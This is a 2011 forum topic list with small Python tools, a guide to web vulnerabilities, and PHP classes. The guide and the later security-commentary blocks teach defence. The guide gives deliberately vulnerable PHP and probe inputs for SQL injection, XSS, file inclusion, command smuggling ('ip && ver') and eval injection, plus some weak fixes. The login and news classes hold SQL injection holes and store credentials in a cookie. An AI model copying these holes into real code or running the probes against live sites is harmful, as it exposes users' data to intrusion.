
Topics - BigBear

#321
Python / [Python] Simple Crack Hash
July 03, 2011, 09:55:03 PM
A simple program for cracking md5 hashes


Code: python

#Simple Crack Hash
#(C) DOddy Hackman 2011
#Test with 202cb962ac59075b964b07152d234b70:123
# Python 2 script: looks the hash up in an online md5 reverse-lookup service

import urllib2,re,sys

nave = urllib2.build_opener(urllib2.HTTPCookieProcessor())
# OpenerDirector exposes "addheaders", not "add_header"
nave.addheaders = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]


def head():
    print "\n\n== -- Crack Hash -- ==\n\n"

def copyright():
    print "\n\n(C) Doddy HAckman 2011\n"

def uso():
    print "\n[+] crackhash.py <hash>\n\n"

def crack(passw):
    print "\n[+] Cracking...\n\n"
    code = toma("http://md5.hashcracking.com/search.php?md5="+passw)
    # run the regex once and reuse the match list
    control = re.findall("Cleartext of (.*) is (.*)",code)
    if control:
        print "[+] Password : "+control[0][1]
    else:
        print "\n[-] Not Found\n\n"

def toma(web):
    return nave.open(web).read()

head()

if len(sys.argv) == 2 :
    crack(sys.argv[1])
else:
    uso()

copyright()

#322
Python / [Python] Proxy Tester
July 03, 2011, 09:54:48 PM
A simple program for testing proxies

Code: python

#!/usr/bin/python
#Proxy Tester (C) Doddy Hackman 2011
# Python 2 script: tries to fetch a test URL through each proxy listed in a file

import urllib2,sys


def toma(web) :
    # uses whatever opener was last installed with urllib2.install_opener()
    return urllib2.urlopen(web).read()

def header() :
    print "\n\n--== Proxy Tester ==--\n"

def copyright() :
    print "\n\n(C) Doddy Hackman 2011\n"
    sys.exit(1)

def sintax() :
    print "\n[*] Sintax : ",sys.argv[0]," <file>"

def testar(host):
    try:
        proxy = urllib2.ProxyHandler({"http":host})
        nave = urllib2.build_opener(proxy)
        # OpenerDirector exposes "addheaders", not "add_header"
        nave.addheaders = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
        urllib2.install_opener(nave)
        toma("http://127.0.0.1/sql.php")
        print "[+] Proxy Found : "+host
    except:
        pass

header()
if len(sys.argv) != 2 :
    sintax()
else :
    print "\n[+] Opening file\n\n"
    try:
        hosts = open(sys.argv[1], "r").readlines()
    except :
        print "\n[-] Error opening file\n"
        copyright()   # exits here, so "hosts" is never used undefined
    for host in hosts:
        host = host.replace("\r","").replace("\n","")
        testar(host)
copyright()

#  The End
#323
Python / [Python] PasteBin Uploader
July 03, 2011, 09:54:33 PM
A simple program for uploading code to pastebin

Code: python

#!/usr/bin/python
#PasteBin Uploader (C) Doddy Hackman 2011
# Python 2 script: posts a local file to pastebin's (old) public API

import urllib,urllib2,sys,re

nave = urllib2.build_opener()
# OpenerDirector exposes "addheaders", not "add_header"
nave.addheaders = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]

def tomar(web,vars) :
    # passing a data string makes urllib2 send a POST request
    return nave.open(web,vars).read()

def head():
    print "\n-- == PasteBin Uploader == --\n\n"

def copyright():
    print "\n(C) Doddy Hackman 2011\n"
    sys.exit(1)

def sintax():
    print "[+] paste.py <file> <title> <perl/python/ruby/php>\n"

def chubir(file,title,type):
    print "[+] Uploading file\n"
    try:
        lineas = open(file,"r").readlines()
    except:
        print "[-] Error open file\n"
        copyright()
    lin = "".join(lineas)
    # urlencode so that & or + inside the pasted code do not break the form fields
    datos = urllib.urlencode({"paste_code":lin,"paste_name":title,"paste_format":type,
                              "paste_expire_date":"N","paste_private":"public","submit":"submit"})
    try:
        code = tomar("http://pastebin.com/api_public.php",datos)
    except:
        print "[-] Page offline\n"
        copyright()   # exits here, so "code" is never read undefined
    if re.findall("Bad API request",code):
        print "[-] Error uploading file\n"
    else:
        print "[+] Enjoy : ",code+"\n"
        copyright()

head()
if len(sys.argv) != 4 :
    sintax()
else :
    chubir(sys.argv[1],sys.argv[2],sys.argv[3])
copyright()



# The End
#324
[Guide] Web-level vulnerabilities



[Title] : Web-level vulnerabilities
[Author] : Doddy Hackman


[Contents]

--===================================--

0x01 : Introduction
0x02 : SQLI
0x03 : Blind SQLI
0x04 : HTML Injection
0x05 : XSS
0x06 : RFI
0x07 : LFI
0x08 : Remote Code Execution
0x09 : Full Path Disclosure
0x10 : Full Source Disclosure
0x11 : PHP Injections

--===================================--


0x01 : Introduction


Hello everyone.

I have started writing this simple guide where I describe, in minimal detail, the most common
web-level vulnerabilities. For each vulnerability I will only explain how it arises and how to fix it, but
I will not go into much depth on the techniques for each one.
Any mistake in the guide, please tell me so I can learn from my errors.


0x02 : SQLI

SQL injections are one of the most used vulnerabilities, because they are among the easiest to exploit once
they are found.
SQL injections occur when an unfiltered variable is included in an SQL statement; then,
through the badly filtered variable, we can insert code that helps us
get columns, extract tables and columns, data and all that.........

An example of this kind of vulnerability

Code: php

<title>LABS SQL INYECTION</title>

<STYLE type="text/css">

body {
background-color: #000000;
color:orange;
font-family:
Courier New;
cursor:crosshair;
font-size: small;
}
</style>

<center><h1><font color=green>LABS SQL INYECTION</font></h1><br><br><br>

<?php

$host = 'localhost';
$user = 'root';
$datos = 'users';

$conexion = mysql_connect($host, $user);
mysql_select_db($datos,$conexion);



if (isset($_GET['id'])) {
$id = $_GET['id'];
}

if(empty($id)){
$id = "1";
}

$sql = mysql_query("SELECT * FROM `hackers` WHERE id=".$id) or die (mysql_error());

$resultado = mysql_fetch_row($sql);

echo "<h3><b>id: </font>".$resultado[0]."<br>";
echo "user: </font>".$resultado[1]."<br>";
echo "pass: </font>".$resultado[2]."</b></h3><br>";

mysql_close($conexion);

?>


As you can see, the mysql_query() function uses a statement containing the variable $id; since the variable
$id is not filtered or protected, code can be inserted in the following way

Code: text

http://127.0.0.1/sql.php?id= HERE?


Starting from id we can put the code to see whether it is vulnerable or not, because id is the badly
filtered variable

To find out whether it is vulnerable we can put a ' in the content of id

If the page's result is something like mysql error blah blah

It is because it is vulnerable

One way to protect against this attack is to check that $id is a number and not strange code meant to modify
the SQL statement


Code: php


if (!is_numeric($_GET['id'])) {
echo "no me jodas !!!<br>";
exit(1);
}



As you can see we use is_numeric for the check; we use it to verify that if $id is not a number, it warns us and
tells us no me jodas !!!

0x03 : Blind SQLI

Blind SQLI comes from the same vulnerability as SQLI, but in this case the admin
uses @ on the functions for the DB connection, or error_reporting at 0, so that
no errors are thrown. A serious mistake, since that is what causes the well-known Blind SQLI

An example of a vulnerable page would be this

Code: php

<title>LABS SQL INYECTION</title>

<STYLE type="text/css">

body {
background-color: #000000;
color:orange;
font-family:
Courier New;
cursor:crosshair;
font-size: small;
}
</style>

<center><h1><font color=green>LABS SQL INYECTION</font></h1><br><br><br>

<?php

$host = 'localhost';
$user = 'root';
$datos = 'hackman';

$conexion = mysql_connect($host, $user,"123");
mysql_select_db($datos,$conexion);



if (isset($_GET['id'])) {
$id = $_GET['id'];
}

if(empty($id)){
$id = "1";
}

$sql = @mysql_query("SELECT * FROM `hackers` WHERE id=".$id);

$resultado = @mysql_fetch_row($sql);

echo "<h3><b>id: </font>".$resultado[0]."<br>";
echo "user: </font>".$resultado[1]."<br>";
echo "pass: </font>".$resultado[2]."</b></h3><br>";

mysql_close($conexion);

?>


As you can see we use @ on the functions mysql_query() and mysql_fetch_row() to avoid errors

So to check whether the page is vulnerable to Blind SQLI we can put this in the id part

Code: text

http://127.0.0.1/sql.php?id=1+and+1=1


Code: text

http://127.0.0.1/sql.php?id=1+and+1=0


If the first link returns a positive result and the second a negative one (it shows nothing)

One way to fix this vulnerability would be the same as for SQLI


Code: php


if (!is_numeric($_GET['id'])) {
echo "no me jodas !!!<br>";
exit(1);
}




0x04 : HTML Injection


HTML Injection is known as the dumbest and easiest vulnerability to pull off, but
do those who say that know how it arises and how to fix it? Of that I am sure they do not.

This vulnerability usually occurs in guestbooks, when a comment is left and
then shown on screen

An example would be this


Code: php


<?php

echo "

<form action='' method=POST>
<input type=text name=mensaje>
<input type=submit value=Mostrar>
</form>

";

if (isset($_POST['mensaje'])) {
echo $_POST['mensaje'];
}

?>



If we want to test whether the page suffers from this vulnerability we only have to enter some
html code

If we enter "<h1>hola</h1>" and it is rendered as such, it is because it is vulnerable

Protecting yourself is easy: just filter the variables

To do this we can use htmlentities() or htmlspecialchars(); use whichever you want, since both
protect

Code: php


<?php

echo "

<form action='' method=POST>
<input type=text name=mensaje>
<input type=submit value=Mostrar>
</form>

";

if (isset($_POST['mensaje'])) {

echo htmlentities($_POST['mensaje']);
}

?>



0x05 : XSS

Well, XSS is a well-known vulnerability and useful for stealing cookies; the vulnerability
occurs when a badly filtered variable is displayed

Code: php


<?php

echo "

<form action='' method=GET>
<input type=text name=msg>
<input type=submit value=Mostrar>
</form>

";

if (isset($_GET['msg'])) {

echo $_GET['msg'];
}

?>



To see whether it is vulnerable we can open the following link with the following code

Code: text

<script>alert("hola");</script>


Code: text

http://127.0.0.1/xss.php?msg=<script>alert("hola");</script>


As you can see the variable msg is sent via GET; the variable is not protected and is
displayed as-is

One way to fix it is to use htmlentities() or htmlspecialchars()

Code: php

<?php

echo "

<form action='' method=GET>
<input type=text name=msg>
<input type=submit value=Mostrar>
</form>

";

if (isset($_GET['msg'])) {

echo htmlspecialchars($_GET['msg']);
}

?>


0x06 : RFI

Well, good old RFI. This vulnerability is very well known; it comes from a misuse of the
include() function and a misconfiguration, the allow_url_include setting being On in php.ini

An example would be this


Code: php

<?php

if (isset($_GET['car'])) {
include($_GET['car']);
}

?>


As you can see, if we want to know whether the page is vulnerable to RFI we can do this

Code: text

http://127.0.0.1/rfi.php?car=http://www.google.com.ar


And if the page shows Google's page, it is because the page is vulnerable to RFI

One way to protect against RFI would be to use a check on the "car" variable in the following way

Code: php


if (isset($_GET['car'])) {

if ($_GET['car'] == "veo") {
include("veo.php");
}

elseif($_GET['car'] == "noveo") {
include("noveo.php");
}
else {
echo "no intentes cosas raras xDDD";
}
}



0x07 : LFI

Well, the well-known LFI. It is similar to RFI, but this one only executes local files, not remote ones as RFI does

An example of a vulnerable page would be like this

Code: php

<?php

if (isset($_GET['car'])) {
include($_GET['car']);
}

?>


To find out whether it is vulnerable we can load the car variable with a ' in the following way

Code: text

http://127.0.0.1/lfi.php?car='


And if it returns something like this

Code: text

Warning: include(') [function.include]: failed to open stream: No such file or directory in C:\xampp\htdocs\666.php on line 4


It is because it is vulnerable xDDD

To protect against this vulnerability, it would be the same way as for RFI


Code: php


if (isset($_GET['car'])) {

if ($_GET['car'] == "veo") {
include("veo.php");
}

elseif($_GET['car'] == "noveo") {
include("noveo.php");
}
else {
echo "no intentes cosas raras xDDD";
}
}



0x08 : Remote Code Execution

This vulnerability is not very well known; it consists of being able to run commands on the attacked machine
without needing to create a shell.

So an example of a vulnerable page would be this.

Code: php

<?php

echo "

<form action='' method=POST>
<input type=text name=cmd>
<input type=submit value=mandar>
</form>

";

if (isset($_POST['cmd'])) {
system("ping ".$_POST['cmd']);
}



?>


As you can see the page runs a ping command with system() against the IP you entered

So what happens if we enter any IP

Well nothing, it just pings the IP you entered

So if we enter this

Code: text

ip && ver


The server would return the result of the ping command with an extra xDDD
Yes, we are looking at the OS version
So the explanation is simple: we just add && to append a command, as long as the IP
entered before was real and the ping ran correctly

So if we want to fix this vulnerability we have to replace anything strange in the
"cmd" variable

The code would look like this

Code: php

<?php

echo "

<form action='' method=POST>
<input type=text name=cmd>
<input type=submit value=mandar>
</form>

";

if (isset($_POST['cmd'])) {

$cmd = $_POST['cmd'];

$cmd = str_replace("&&", "", $cmd);
$cmd = str_replace(";", "", $cmd);
$cmd = str_replace("-", "", $cmd);
$cmd = str_replace("?", "", $cmd);
$cmd = str_replace("||", "", $cmd);
$cmd = str_replace("|", "", $cmd);
$cmd = stripslashes($cmd);

system("ping ".$cmd);

}



?>


0x09 : Full Path Disclosure

This vulnerability occurs when an error happens, whether an error in the result of the function we are
using or in the syntax used in it

An example would be this

Code: php

<?php
if (isset("no se nada de php")) {

}
?>


What ugly code I write xDDD

So the error it returns would be this

Code: text

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in C:\xampp\htdocs\666.php on line 2


As we can see it returns the current directory where the php file is executed; this is what is called
full path disclosure

This vulnerability also appears in SQL and LFI, when we entered the quote ' in the result of include() and mysql_query()
In the second case it was a full path disclosure, besides indicating that the page really was vulnerable to SQL
In the first case it was also due to the misuse of the include() function, returning an error with a full path
disclosure

0x10 : Full Source Disclosure

Well, this vulnerability lets us download files from a web server because it does not
filter the variables

An example would be this

Code: php


if (isset($_GET['down'])) {
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($_GET['down']));
readfile($_GET['down']);
}


So if we put the path we want in the "down" variable, we are done.
An example of use would be this

Code: text

http://127.0.0.1/down.php?down=c:/secretos.txt


And with that we would download the secret file, if it exists xDDD

So one way to avoid this vulnerability would be to use a DB containing a table
with the download links; then, once the down variable is detected, we would check that it is
a number, otherwise bye xDDD

0x11 : PHP Injections

Well, PHP injections usually happen when the eval() function is used.
The eval() function lets us execute php code

An example of this vulnerability would be this

Code: php

<?php

if (isset($_GET['te'])) {
eval($_GET['te']);
}

?>


As you can see, it is a very rare and special case in a sense xDDD

So if we run this link

Code: text

http://127.0.0.1/php?te=echo "hola mundo";


If we look at the screen, this link returns hola mundo; I think it is obvious that it is vulnerable

One way to protect yourself would be not to use eval()

--========--
¿ The End ?
--========--
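The fixes in the guide above rely on is_numeric() and on stripping characters out of the input. As an added example that is not part of the guide (the table, page and file names and the mysqli connection details are assumptions), here are the same handlers written the way a reviewer would ask for them: the id is validated as an integer and bound into a prepared statement, output is encoded for the HTML context, include() only ever sees names from a fixed map, the ping target must pass FILTER_VALIDATE_IP and is quoted with escapeshellarg(), and downloads are looked up by id in a fixed table rather than by a client-supplied path.

```php
<?php
// Added example, not code from the guide. Assumed: table `hackers` with columns
// id and user, pages veo.php/noveo.php, one downloadable file, mysqli credentials.

// 0x02 / 0x03: bind $id instead of concatenating it. is_numeric() accepts "1e3"
// and " 1"; FILTER_VALIDATE_INT plus a bound parameter leaves nothing for an
// injected ' or AND 1=0 to act on, whether errors are displayed or not.
function buscarHacker(mysqli $db, $idRaw) {
    $id = filter_var($idRaw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                                  // reject, do not "clean"
    }
    $stmt = $db->prepare("SELECT id, user FROM `hackers` WHERE id = ?");
    $stmt->bind_param('i', $id);                      // the value never becomes SQL text
    $stmt->execute();
    $stmt->bind_result($rid, $user);
    $fila = $stmt->fetch() ? ['id' => $rid, 'user' => $user] : null;
    $stmt->close();
    return $fila;
}

// 0x04 / 0x05: encode when printing, for the HTML context you print into.
// ENT_QUOTES also encodes ' so the value is safe inside single-quoted attributes.
function h($s) {
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 0x06 / 0x07: map request names to files; the request value itself never reaches include().
function paginaPermitida($car) {
    $paginas = ['veo' => 'veo.php', 'noveo' => 'noveo.php'];   // assumed page names
    return isset($paginas[$car]) ? $paginas[$car] : null;
}

// 0x08: validate the IP before it goes anywhere near a shell, then quote it.
// "127.0.0.1 && ver" fails FILTER_VALIDATE_IP outright, so no blacklist is needed.
function comandoPing($ipRaw) {
    if (filter_var($ipRaw, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // -c 1 sends a single packet (assumed Unix ping; Windows uses -n 1)
    return "ping -c 1 " . escapeshellarg($ipRaw);
}

// 0x10: serve files by id from a fixed table, never by a client-supplied path.
function archivoDescarga($downRaw) {
    $archivos = [1 => '/var/www/files/manual.pdf'];     // assumed download table
    $id = filter_var($downRaw, FILTER_VALIDATE_INT);
    if ($id === false || !isset($archivos[$id])) {
        return null;
    }
    return $archivos[$id];
}

// Wiring for the request parameters the guide used.
if (isset($_GET['car'])) {
    $f = paginaPermitida($_GET['car']);
    if ($f === null) { http_response_code(400); exit; }
    include($f);
}

if (isset($_POST['cmd'])) {
    $cmd = comandoPing($_POST['cmd']);
    if ($cmd === null) { http_response_code(400); exit; }
    echo "<pre>" . h(shell_exec($cmd)) . "</pre>";      // command output is encoded too
}

if (isset($_GET['down'])) {
    $ruta = archivoDescarga($_GET['down']);
    if ($ruta === null) { http_response_code(404); exit; }
    header("Content-Type: application/octet-stream");
    header("Content-Disposition: attachment; filename=" . basename($ruta));
    readfile($ruta);
    exit;
}

if (isset($_GET['id'])) {
    $db = new mysqli('localhost', 'app', 'secret', 'users');   // assumed credentials
    $fila = buscarHacker($db, $_GET['id']);
    echo $fila ? "user: " . h($fila['user']) : "not found";
}
?>
```

The pattern in every handler is the same: decide what a valid value looks like (an integer, a name from a map, an IP address), reject anything else with an error status, and only then hand the value to the database, the filesystem or the shell. Removing "&&" and ";" as the guide's 0x08 fix does leaves other separators such as a newline or a backtick untouched, which is why validation is preferred over a blacklist.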
#325
Back-end / [PHP Class] Get Info By Doddy H
July 03, 2011, 09:52:48 PM
Well, this is nothing special, just a simple class that gives you information about the visitor

Code: php

<?php

/*

Simple Class GetInfo

By Doddy Hackman

*/


class getinfo {


public function ip() {
// REMOTE_ADDR is the visitor's address; SERVER_ADDR would be the server's own
return htmlentities($_SERVER['REMOTE_ADDR']);
}

public function navegador() {

$navegador = get_browser($_SERVER['HTTP_USER_AGENT'], true);
return array(htmlentities($navegador['browser']),htmlentities($navegador['version']));
}

public function so() {

$navegador = get_browser($_SERVER['HTTP_USER_AGENT'], true);
return htmlentities($navegador['platform']);

}
}

?>


Functions

Code: text

ip() // Gives you the IP
navegador() // Gives you the browser
so() // Gives you the OS

#326
Back-end / [PHP Class] Loginow 0.2 By Doddy H
July 03, 2011, 09:52:37 PM
Hello everyone.

I have just written my first class in PHP; it is used
to perform logins on websites with the following options


* extracts values from the form to perform the check
* login via DB
* login via an md5 password set by you
* If the login succeeds it creates a cookie

I have not managed to test it thoroughly
But here is an example of how to use it


test.php

Code: php


include_once("loginow.php");

if (isset($_POST['mandar'])) {
$nave = new loginow;
$nave->campos("usuario","password");
//if ($nave->secure("admin","098f6bcd4621d373cade4e832627b4f6")) {
if ($nave->database("localhost","root","","hackman","hackers","usuario","password")) {
$nave->cookienow("login");
echo "login correcto";
} else {
echo "Error en el login";
exit(1);
}
} else {
echo "
<form action='' method=POST>
Usuario : <input type=text name=usuario value=admin><br>
Password : <input type=text name=password value=test><br>
<input type=submit name=mandar value=mandar></form>";
}


As you can see we use the functions

campos(); # we set the names of the user and pass fields to perform the check
secure(); # we use this function to check against a user and pass set by us
database(); # we give the DB data and its columns to perform the check; of course the class will only rely on the first field


loginow.php

Code: php

<?php

/*

Simple Class for login of the webs

(c) DOddy Hackman 2010


*/

class loginow {

private $host;
private $db;
private $user;
private $pass;
private $tabla;
private $columna1;
private $columna2;
private $usereal;
private $passreal;
private $campouser;
private $campopass;
private $cookiename;

public function campos($campouser,$campopass) {
if (isset($_POST[$campouser])) {
$this->campouser = $_POST[$campouser];
$this->campopass = md5($_POST[$campopass]);
} else {
$this->campouser = $campouser;
$this->campopass = $campopass;
}
}

public function database($host,$dbuser,$dbpass,$db,$tabla,$columna1,$columna2) {
mysql_connect($host,$dbuser,$dbpass);
mysql_select_db($db);
$que = mysql_query("SELECT * FROM ".$tabla);
while ($test = mysql_fetch_array($que)) {
if ($this->campouser == $test[$columna1] and $this->campopass == $test[$columna2]) {
$this->usereal = $test[$columna1];
$this->passreal = $test[$columna2];
return true;
}
}
return false;
}

public function secure($user,$pass) {
if ($this->campouser == $user and $this->campopass == $pass) {
$this->usereal = $user;
$this->passreal = $pass;
return true;
} else {
return false;
}
}

public function cookienow($cookiename) {
setcookie($cookiename,base64_encode($this->usereal."@".$this->passreal));
}

}

?>


Any improvement, bug or vulnerability found, please tell me so I can improve it
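The loginow class above compares an md5 of the submitted password against every row of the table and then stores user@hash in a base64 cookie. As an added example that is not part of the class (table and column names and the mysqli credentials are assumptions; password_hash()/password_verify() need PHP 5.5 or later), here is the database login written with a bound username, a salted hash check and a server-side session, so the client never holds the credentials:

```php
<?php
// Added example, not part of loginow. Assumed: table `hackers` with columns
// usuario and password (the latter holding a password_hash() value).

// One-time, when the account is created: store a salted hash, never md5().
function crearHashPassword($passwordClaro) {
    return password_hash($passwordClaro, PASSWORD_DEFAULT);
}

// Fetch only the one row for this user; the username is bound, never concatenated,
// so a quote in the form field cannot change the statement.
function verificarLogin(mysqli $db, $usuario, $passwordClaro) {
    $stmt = $db->prepare("SELECT password FROM `hackers` WHERE usuario = ? LIMIT 1");
    $stmt->bind_param('s', $usuario);
    $stmt->execute();
    $stmt->bind_result($hash);
    $encontrado = (bool) $stmt->fetch();
    $stmt->close();
    // Always run one verify, even when the user does not exist, so a missing user
    // costs the same time as a wrong password (no user enumeration by timing).
    $hashAComparar = $encontrado ? $hash : password_hash('dummy', PASSWORD_DEFAULT);
    $ok = password_verify($passwordClaro, $hashAComparar);
    return $encontrado && $ok;
}

// Successful login: regenerate the session id (defeats session fixation) and keep
// only the username on the server; nothing secret is written into a cookie.
function iniciarSesion($usuario) {
    session_start();
    session_regenerate_id(true);
    $_SESSION['usuario'] = $usuario;
}

if (isset($_POST['mandar'])) {
    $db = new mysqli('localhost', 'app', 'secret', 'hackman');   // assumed credentials
    if (verificarLogin($db, $_POST['usuario'], $_POST['password'])) {
        iniciarSesion($_POST['usuario']);
        echo "login correcto";
    } else {
        echo "Error en el login";
    }
}
?>
```

The cookie the class sets, base64(user@md5), can be decoded by anyone who reads it and replayed as long as the password is unchanged; a session id that references server-side state carries neither problem and can be invalidated at logout.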
#327
Back-end / [PHP Class] Noticion 0.9
July 03, 2011, 09:52:20 PM
Well, in this version I removed that option of using databases, which was unnecessary because
you cannot have several; a big mistake on my part, but thanks for telling me. In this version I removed some things
that were not needed and replaced the use of databases with tables

To open the connection we use

Code: php

datos($host,$user,$pass,$db)


To create a new category we use

Code: php

crearcategoria($nuevacategoria)


To delete a category we use

Code: php

eliminarcategoria($eliminarcategoria)


To get an array with all available categories we use

Code: php

listarcategorias()


To create a new news item we use

Code: php

nuevo($x_titulo,$x_contenido,$x_fecha,$categoria)


To modify the content we use

Code: php

mod($categoria,$id,$tit,$con,$fech)


To delete a news item we use

Code: php

eliminar($id,$categoria)


To view the content of a news item we use

Code: php

vereste($id,$categoria)


To receive a list of all news items we use

Code: php

vertodo($categoria)


To create a comment we use

Code: php

crearcomentario($categoria,$id_noticia,$fecha,$apodo,$mensaje)


To modify the content of a comment we use

Code: php

modcomentario($categoria,$id,$fecha,$apodo,$contenido)


To view the content of a comment we use

Code: php

vercomentarios($categoria,$id)


To delete a comment

Code: php

borrarcomentario($categoria,$id)


To close the connection with the mysql server we use

Code: php

close()



Code: php

<?php

/*

Noticion 0.9

(c) DOddy Hackman 2011

*/


class noticion {

private $db;

public function datos($host,$user,$pass,$db) {

$this->db = $db;

if (@mysql_connect($host,$user,$pass)) {
if (@mysql_select_db($db)) {
return true;
}
}
}

public function crearcategoria($nuevacategoria) {

$todo1 = "create table categoria_$nuevacategoria (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
titulo VARCHAR(255) NOT NULL,
contenido TEXT NOT NULL,
fecha VARCHAR(255) NOT NULL,
PRIMARY KEY (id));
";

$todo2 = "create table comentarios_$nuevacategoria (
id_noticia int(10),
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
fecha VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
";

if (@mysql_query($todo1)) {
if (@mysql_query($todo2)) {
return true;
}
}

}

public function eliminarcategoria($eliminarcategoria) {

if (@mysql_query("DROP TABLE categoria_$eliminarcategoria")) {
if (@mysql_query("DROP TABLE comentarios_$eliminarcategoria")) {
return true;
}

}
}


public function eliminar($id,$categoria) {
if (is_numeric($id)) {
if (@mysql_query("DELETE FROM categoria_$categoria where id='$id'")) {
return true;
}
}
}

public function nuevo($x_titulo,$x_contenido,$x_fecha,$categoria) {
$sumo = mysql_query("SELECT MAX(id) FROM categoria_$categoria");

$s = mysql_fetch_row($sumo);

foreach ($s as $d) {
$x_id = $d+1;
}
if (@mysql_query("INSERT INTO categoria_$categoria(id,titulo,contenido,fecha)values('$x_id','$x_titulo','$x_contenido','$x_fecha')")) {
return true;
}
}

public function vereste($id,$categoria) {
if (is_numeric($id)) {
$total = array();
if ($que = @mysql_query("SELECT id,titulo,contenido,fecha FROM categoria_$categoria WHERE id='$id'")) {
while ($ver = @mysql_fetch_array($que)) {
return array($ver[0],$ver[1],$ver[2],$ver[3]);
}
}
}
}

public function listarcategorias() {

$found = array();

if ($re = @mysql_query("show tables from ".$this->db)) {

while($dat = mysql_fetch_row($re)) {
// split() is deprecated; explode() does the same for a literal separator
$separo = explode("_",$dat[0]);
array_push($found,$separo[1]);
}
return array($found);
}

}

public function vertodo($categoria) {
$total = array();
if ($que = @mysql_query("SELECT id,titulo,contenido,fecha FROM categoria_$categoria")) {
while ($ver = @mysql_fetch_array($que)) {
array_push($total,$ver);
}
return array($total);
}
}

public function mod($categoria,$id,$tit,$con,$fech) {
if (@mysql_query("UPDATE categoria_$categoria SET id='$id',titulo='$tit',contenido='$con',fecha='$fech' where id='$id'")) {
return true;
}
}

public function crearcomentario($categoria,$id_noticia,$fecha,$apodo,$mensaje) {

$sumo = mysql_query("SELECT MAX(id_comentario) FROM comentarios_$categoria");

$s = mysql_fetch_row($sumo);

foreach ($s as $d) {
$x_id = $d+1;
}

if (mysql_query("INSERT INTO comentarios_$categoria(fecha,apodo,mensaje,id_noticia,id_comentario)values('$fecha','$apodo','$mensaje','$id_noticia','$x_id')")) {
return true;
}

}

public function modcomentario($categoria,$id,$fecha,$apodo,$contenido) {
if (@mysql_query("UPDATE comentarios_$categoria SET id_comentario='$id',fecha='$fecha',apodo='$apodo',mensaje='$contenido' where id_comentario='$id'")) {
return true;
}
}

public function vercomentarios($categoria,$id) {
$todo = array();
if ($ver = @mysql_query("SELECT id_noticia,id_comentario,apodo,mensaje,fecha FROM comentarios_$categoria")) {
while ($que = @mysql_fetch_array($ver)) {
// keep only the comments whose id_noticia matches the requested news item
if ($que[0] == $id) {
array_push($todo,$que);
}
}
return array($todo);
}

}


public function borrarcomentario($categoria,$id) {
if (is_numeric($id)) {
if (@mysql_query("DELETE FROM comentarios_$categoria where id_comentario='$id'")) {
return true;
}
}
}


public function close() {
mysql_close();
}


}

?>


Usage examples


Code: php

<?php

include_once("noticion.php");

$name = New noticion;

if ($name->datos("localhost","root","","test")) {
echo "conexion abierta<br>";

//$name->crearcategoria("py");

//if ($name->borrarcomentario("perl","1")) {
//echo "ok";
//}


//$name->modcomentario("perl","2","a","a","a");

list($recibo) = $name->vercomentarios("perl","1");

echo count($recibo)."<BR><BR>";

foreach($recibo as $a) {
echo $a[2]."<br>";
}


//$name->crearcomentario("perl","1","1","1","1");


//if ($name->nuevo("aa","aa","aa","perl")) {
//echo "ok";
//}

//$ver = $name->vereste("1","perl");

//echo $ver[0];

//$name->mod("perl","3","cambie","cambie","cambie");

//$re = $name->listarcategorias();

//$name->eliminar("5","perl");


//list($re) = $name->vertodo("perl");

//foreach ($re as $r) {
//echo $r[0]."<br>";
//echo $r[1]."<br><br>";
//}


//$name->crearcategoria("perl");

//foreach($t as $veo) {
//echo $veo[id]."<br>";
//}

$name->eliminarcategoria("py");
}



Any error, vulnerability or improvement, please tell me so I can improve this class
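Noticion builds a table name from the category ("categoria_$categoria") and interpolates every other argument straight into the SQL. A table name cannot be bound as a parameter, so it has to be validated instead. As an added example that is not part of Noticion 0.9 (the connection values are the ones the usage example above uses; everything else is an assumption), here are nuevo() and vereste() rewritten so that the category is checked against a strict pattern and the title, content, date and id are bound with mysqli prepared statements:

```php
<?php
// Added example, not part of Noticion. Table layout follows crearcategoria():
// categoria_<name>(id AUTO_INCREMENT, titulo, contenido, fecha).

// A category name may only contain letters, digits and underscore, so it can be
// interpolated into "categoria_<name>" without changing the statement's meaning.
function nombreCategoriaValido($categoria) {
    return is_string($categoria) && preg_match('/^[A-Za-z0-9_]{1,32}$/', $categoria) === 1;
}

// id is AUTO_INCREMENT, so let MySQL assign it instead of SELECT MAX(id)+1
// (two concurrent inserts would otherwise pick the same id).
function nuevoSeguro(mysqli $db, $titulo, $contenido, $fecha, $categoria) {
    if (!nombreCategoriaValido($categoria)) {
        return false;
    }
    $stmt = $db->prepare("INSERT INTO `categoria_$categoria` (titulo, contenido, fecha) VALUES (?, ?, ?)");
    $stmt->bind_param('sss', $titulo, $contenido, $fecha);   // values are sent out of band
    $ok = $stmt->execute();
    $id = $db->insert_id;
    $stmt->close();
    return $ok ? $id : false;
}

function veresteSeguro(mysqli $db, $id, $categoria) {
    $id = filter_var($id, FILTER_VALIDATE_INT);
    if ($id === false || !nombreCategoriaValido($categoria)) {
        return null;
    }
    $stmt = $db->prepare("SELECT id, titulo, contenido, fecha FROM `categoria_$categoria` WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($rid, $titulo, $contenido, $fecha);
    $fila = $stmt->fetch() ? [$rid, $titulo, $contenido, $fecha] : null;
    $stmt->close();
    return $fila;
}

$db = new mysqli('localhost', 'root', '', 'test');   // same values as the usage example above
$nuevoId = nuevoSeguro($db, "titulo", "contenido <b>sin</b> filtrar", "2011-07-03", "perl");
if ($nuevoId !== false) {
    $noticia = veresteSeguro($db, $nuevoId, "perl");
    // Encode at output time; the stored text is kept exactly as it was entered.
    echo htmlspecialchars($noticia[1], ENT_QUOTES, 'UTF-8') . "<br>";
}
?>
```

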